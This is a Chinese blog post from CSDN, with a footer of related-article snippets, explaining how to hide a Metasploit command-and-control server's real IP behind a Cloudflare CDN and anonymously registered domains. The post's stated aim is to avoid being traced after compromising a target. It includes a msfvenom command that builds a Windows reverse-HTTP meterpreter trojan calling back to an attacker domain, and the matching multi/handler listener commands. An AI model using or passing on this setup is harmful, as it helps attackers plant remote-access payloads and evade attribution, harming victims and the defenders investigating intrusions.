Metasploit-域名上线隐藏IP

已于 2022-08-06 01:55:00 修改
阅读量725 收藏 5
点赞数 8
分类专栏: 内网渗透 # 渗透测试-MSF 文章标签: 安全 web安全 网络安全 系统安全 安全性测试
于 2022-08-04 16:31:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61503377/article/details/126130992
版权

仅供学习使用,请勿用于非法途径,后果自负

Metasploit域名上线隐藏IP

概述

为什么要隐藏IP?
在拿下了目标机之后,目标机在内网里面,使用msf或者CS时,用自己的VPS做服务器的话,导致很容易被溯源。

域名上线原理

当我们访问域名时会经过域名解析 域名解析就是域名到IP地址的转换过程,那么就意味这我们访问域名实际上最后是访问的真实IP。

A记录: 将域名指向一个IPv4地址(例如:100.100.100.100),需要增加A记录。
CNAME记录: 如果将域名指向一个域名,实现与被指向域名相同的访问效果,需要增加CNAME记录。这个域名一般是主机服务商提供的一个域名。
MX记录: 建立电子邮箱服务,将指向邮件服务器地址,需要设置MX记录。建立邮箱时,一般会根据邮箱服务商提供的MX记录填写此记录。
NS记录: 域名解析服务器记录,如果要将子域名指定某个域名服务器来解析,需要设置NS记录。
TXT记录: 可任意填写,可为空。一般做一些验证记录时会使用此项,如:做SPF(反垃圾邮件)记录。
AAAA记录: 将主机名(或域名)指向一个IPv6地址(例如:ff03:0:0:0:0:0:0:c1),需要添加AAAA记录。

通过CDN上线MSF

CDN的全称是Content Delivery Network,即内容分发网络。其目的是通过在现有的Internet中增加一层新的CACHE(缓存)层,将网站的内容发布到最接近用户的网络”边缘“的节点,目的提高用户访问网站的速度。

在这里插入图片描述

CDN上线具体实现

基础配置:一台VPS、一个域名,这里的VPS最好是匿名的
既然是隐藏自身 那么域名肯定不能使用自己备案的域名

https://freenom.com/ 注册免费域名 注册失败,可以用gmail注册

https://cart.godaddy.com/ 注册匿名域名

https://www.cloudflare.com/ 免费CDN

  1. 购买好域名之后,进入cloudflare.com添加域名。
    在这里插入图片描述

  2. 添加A记录。
    在这里插入图片描述

  3. 返回https://cart.godaddy.com/进行入门指南的设置。
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    将所有的开关都关闭。

  4. 编辑名称服务器,设置为cloudflare.com的名称服务器。
    点击改变
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述在这里插入图片描述

  5. 检查是否配置成功。
    ping下该域名,查看是否为vps的IP地址,不是的话则配置成功。

在这里插入图片描述
配置成功。

  1. MSF生成木马
msfvenom -p windows/x64/meterpreter/reverse_http LHOST=www.zsyyme.info LPORT=2095 -f exe -o shell.exe

在这里插入图片描述

  1. MSF开启相对应监听
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set lhost www.zsyyme.info
set lport 2095
run

在这里插入图片描述
在这里插入图片描述

  1. 用wireshark抓取流量即可!
曲折上升
关注
  • 8
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
metasploit-omnibus
03-31
metasploit-framework Omnibus项目 该项目为metasploit-framework创建了特定于平台的全栈软件包。 这与Metasploit社区版不同。 它仅包含框架命令行界面以及相关的工具和模块。 安装包装 如果您只想安装此软件包,...
Eternalblue-Doublepulsar-Metasploit-master
05-11
在这个名为"Eternalblue-Doublepulsar-Metasploit-master"的压缩包中,我们很可能是找到了一个关于这些著名漏洞利用工具的开源项目。 1. **永恒之蓝(EternalBlue)**:这是一个由美国国家安全局(NSA)开发的网络...
域名做CDN来通过隐藏服务器真实IP的方法来防止DDoS攻击(转)
angou6476的博客
01-21 2046
隐藏服务器真实IP是解决问题最好和最快的方法,但只针对小流量,大流量同样会扛不住。 服务器前端加CDN中转,比如阿里云、百度云加速、360网站卫士、加速乐、安全宝等,如果资金充裕的话,可以购买高防的盾机,用于隐藏服务器真实IP域名解析使用CDN的IP,所有解析的子域名都使用CDN的IP地址。此外,服务器上部署的其他域名也不能使用真实IP解析,全部都使用CDN来解析。 另外防止服...
怎么隐藏服务器的ip地址
qq392465929的博客
06-27 2560
为网络管理员的我们多知道遇到过服务器因为拒绝服务攻击(DDOS攻击)遇到网站瘫痪的情况是很糟心,随着客户信息越来越受到公司企业的重视,网站服务器的安全也越来越受到关注,但无法避免的是会遇到黑客使用DDoS攻击网站。...
DNS隐蔽通道 是可以通过dig 子域名来追踪其真实IP
weixin_34315665的博客
11-15 485
比如a.friendskaka.com 是我的外发子域名,那么可以按照下面两个命令来追踪IP: bonelee@bonelee-VirtualBox:~/桌面$ dig auth.a.friendskaka.com @8.8.8.8 +trace ; <<>> DiG 9.10.3-P4-Ubuntu <<>&g...
阿里云域名使用cloudflare的DNS解析隐藏真实IP
HunterKM的博客
05-31 1万+
本次记录纯技术研究,杜绝任何违法操作,我坚决拥护党,热爱党,跟党走.为中国梦的实现而奋斗!1.首先你需要已经通过阿里云注册了域名且通过了实名认证,在coudflare中也已经注册账号.阿里云设置DNS域名解析 1.首先你需要已经通过阿里云注册了域名且通过了实名认证,在coudflare中也已经注册账号. 进入cloud网站点击添加你的域名.例子: test.com 然后一直下一步下一步,会显示...
域名线隐藏IP
weixin_53747497的博客
04-29 265
配置 NameServer 更换解析服务器的原因就是,将subia.top 域名的所有解析功能都托管在 Cloudflare ,这样 Cloudflare 就可以提供 CDN 的解析功能。
metasploit-framework-master.zip
09-08
"metasploit-framework-master.zip" 是这个框架的源代码压缩包,包含了完整的开发环境和工具集合。 **Metasploit框架的核心组件** 1. **Payloads(有效载荷)**:有效载荷是攻击的核心部分,它们在目标系统上执行...
metasploit-framework-6.3.34.zip
09-17
3. 反取证:框架内的反取证模块可以帮助研究人员了解攻击者可能采取的隐藏手段,以防止或减轻未来攻击。 4. 自定义脚本:Metasploit支持Ruby语言编写自定义脚本,用户可以根据需求创建新的攻击模块或者扩展现有功能...
metasploit-4.17.1-2020080301-windows-x64-installer.exe
01-10
metasploit
防止DDOS攻击有效方法:隐藏服务器真实IP
WGH100817的博客
08-31 718
如今,网站服务器的安全受到越来越多的重视,但是难免会遇到黑客使用DDoS攻击网站,为了网站的安全通常都会做好防御,其中防止DDoS攻击有效方法:隐藏服务器真实IP,该技术能够有效地保护网站的安全。   隐藏服务器真实IP地址的具体方法如下:   1、使用高防的盾机服务   盾机服务的原理:盾...
如何隐藏服务器真实 IP,有哪些方法
m0_66268916的博客
01-15 561
4、服务器 ICMP:禁止服务器 ICMP 响应,一般情况下攻击者会通过 IP 段来扫描存在的机器,即攻击扫描到服务器 IP 时,IP 做出响应,即被做为有用的 IP,一旦我们禁止服务器 ICMP 回显功能,那么即使攻击者扫描到我们的服务器 IPIP 也不会做出回应,让攻击者认为此 IP 没有用。网站服务器的安全受到越来越多的重视,但是难免会遇到黑客使用 DDoS 攻击网站,为了网站的安全通常都会做好防御,其中防止 DDoS 攻击有效方法:隐藏服务器真实 IP ,该技术能够有效地保护网站的安全。
(记录向)VIPER隐藏真实IP域名线
daxi0ng的博客
05-12 1012
一、使用VIPER本身的功能可以禁止没有安装证书的IP访问后台,这个官网已经写好了 https://www.yuque.com/vipersec/help/xbz4hx 二、搭配Cloudflare证书反溯源 1、首先创建源服务器证书 2、然后设置加密模式为完全 3、关闭建议程序 4、开启监听 ...
隐藏服务器源IP的几种方法
最新发布
m0_66326520的博客
01-23 1373
用户可以对HTTP协议字段进行组合,制定访问控制规则,支持地域、请求头、请求内容设置过滤条件,支持正则语法。
服务器租用如何隐藏真实ip
GNET0328的博客
11-03 244
盾机服务的原理:盾机是一种减少攻击的手段,是通过利用两台高硬防的单线服务器作为端口映射到双线服务器的两个IP,将虚设的IP映射在真实IP的主机上,这样就能够首先避免被直接攻击的绝对目标,这样也让攻击方无法正确的找到双线服务器的真实IP,并且单线的硬防也更高。另外,为了防止服务器的IP被传送信息泄露,还可以选择不使用服务器发送邮件的功能,若必须要进行邮件发送,可以选择使用第三方的代理发送,这样对外显示的IP也就是代理的IP,不是服务器的IP就不会出现泄露。该技术是相对较新的,与其他的方法都是有相同点的。
隐藏服务器IP的五种方法
m0_70446426的博客
08-09 3395
VPN会为服务器分配一个虚拟的IP地址,然后将数据通过加密隧道传输,从而保护服务器的真实IP地址。1. 使用代理服务器:通过使用代理服务器,您可以将网络流量路由到代理服务器,隐藏实际的服务器IP地址。访问者只能看到代理服务器的IP地址,而无法直接获取到服务器的真实IP地址。4. 使用云服务提供商的隐藏功能:一些云服务提供商提供了隐藏服务器IP的功能,例如云防火墙、安全组设置等。5. 配置防火墙规则:通过配置防火墙规则,可以限制对服务器的访问,并只允许特定的IP地址范围或者特定的网络进行访问。
高段位隐藏IP、提高溯源难度的几种实用方案!
hackzkaq的博客
05-27 2226
更多渗透技能 欢迎搜索公众号:白帽子左一 为什么会有此文: 原因一:保护个人隐私是是第一出发点;科技进步飞快,网络也渗透入生活中的方方面面,近几年的隐私泄露事故时有发生,我们该如何保护个人隐私? 原因二:得到了大佬的帮助和指点,希望把对我的指点内容记录一下,也能为其他人提供一点点帮助! 本文转自freebuf的ddq,其整理归纳了几种有效的隐藏IP提高溯源难度的几种方案,篇幅略长,但内容很全及其实用 本文目标读者是对网络攻防技术、网络安全技术感兴趣的相关读者,可以将本篇文章作为一个思路上的启发科普文章
随机生成IPv6地址脚本及安装msfconsole服务
ydt的博客
08-31 992
创建随机地址脚本,以及安装msfconsole服务
100% 搭建你自己的匿名网站(暗网网站)
热门推荐
kEnnponN的专栏
09-12 4万+
序言  前几年一则朋友圈把暗网炒火了... 其实暗网没那么神秘,就是一种特定的方式的部署与请求而已 请求方需要使用 tor browser 响应方 需要使用 tor 的hidden_service 话不多少,进入搭建阶段 环境  系统:一台三十块一个月的香港vps 自带centos7 所需:Nginx+tor 更新yum源 rpm -Uvh https://dl....
metasploitframework-latest
07-13
Metasploit Framework 是一个开源的渗透测试工具,它提供了一系列的漏洞利用模块、Payload生成器和其他辅助工具,帮助安全专业人员评估系统和网络的安全性。 要获取最新版本的 Metasploit Framework,你可以按照以下步骤进行操作: 1. 首先,确保你的系统已经安装了 Ruby 和 Git。如果还没有安装,你可以根据你的操作系统下载并安装它们。 2. 打开终端或命令提示符,并切换到你希望存放 Metasploit Framework 的目录。 3. 使用以下命令克隆 Metasploit Framework 的 Git 仓库: ``` git clone https://github.com/rapid7/metasploit-framework.git ``` 4. 切换到克隆下来的 metasploit-framework 目录: ``` cd metasploit-framework ``` 5. 安装依赖项。在终端中运行以下命令: ``` bundle install ``` 6. 安装完成后,你可以通过以下命令启动 Metasploit Framework: ``` ./msfconsole ``` 这将启动 Metasploit Framework 的控制台界面,你可以使用各种模块和工具来进行渗透测试。 请注意,Metasploit Framework 是一个强大的工具,需要遵循法律和伦理规范使用。在使用之前,请确保你已经获得了相关的授权和权限。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

曲折上升

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值